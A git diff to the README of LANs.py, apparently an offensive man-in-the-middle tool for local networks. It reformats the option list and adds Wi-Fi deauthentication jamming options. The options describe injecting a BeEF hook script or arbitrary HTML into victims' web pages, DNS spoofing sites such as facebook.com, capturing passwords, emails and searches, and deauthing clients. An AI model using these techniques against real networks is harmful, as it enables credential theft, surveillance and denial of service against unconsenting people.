diff --git a/README.md b/README.md
index a56de85..5ecb2bc 100644
--- a/README.md
+++ b/README.md
@@ -14,9 +14,12 @@ Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking
All options:
``` shell
-python LANs.py [-a] [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d]
- [-v] [-dns DNSSPOOF] [-r IPADDRESS] [-set] [-p] [-na] [-n] [-i INTERFACE]
- [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP]
+Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
+ [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
+ [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
+ [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
+ [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
+ [--directedonly] [--accesspoint ACCESSPOINT]
```
Usage
@@ -93,40 +96,49 @@ python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '
Owned.
``` shell
python LANs.py -h
```
+Normal Usage
--b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
-
--c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
-
--d: open an xterm with driftnet to see all images they view
-
--dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
-
--a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this
-
--r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN
-
--u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
-
--i INTERFACE: specify interface; default is first interface in `ip route`, eg: -i wlan0
-
--ip: target this IP address
-
--n: performs a quick nmap scan of the target
-
--na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
-
--p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
-
--pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
-
--rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
-
--rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
-
--v: show verbose URLs which do not truncate at 150 characters like -u
-
+ * -b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
+
+ * -c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
+
+ * -d: open an xterm with driftnet to see all images they view
+
+ * -dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
+
+ * -a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this
+
+ * -r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN
+
+ * -u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
+
+ * -i INTERFACE: specify interface; default is first interface in `ip route`, eg: -i wlan0
+
+ * -ip: target this IP address
+
+ * -n: performs a quick nmap scan of the target
+
+ * -na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
+
+ * -p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
+
+ * -pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
+
+ * -rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
+
+ * -rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
+
+ * -v: show verbose URLs which do not truncate at 150 characters like -u
+Wifi Jamming
+ * -s MAC_Address_to_skip: Specify a MAC address to skip deauthing. Example: -s 00:11:BB:33:44:AA
+ * -ch CHANNEL: Limit wifijammer to single channel
+ * -m MAXIMUM: Maximum number of clients to deauth
+ * -no: Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
+ * -t TIME_INTERVAL: Time between each deauth packet. Default is maximum. If you see scapy errors like 'no buffer space' try: -t .00001
+ * --packets NUMBER: Number of packets to send in each deauth burst. Default is 1 packet.
+ * --directedonly: Don't send deauth packets to the broadcast address of APs and only send to client/AP pairs
+ * --accesspoint ROUTER_MAC: Enter the MAC address of a specific AP to target.
### Clean up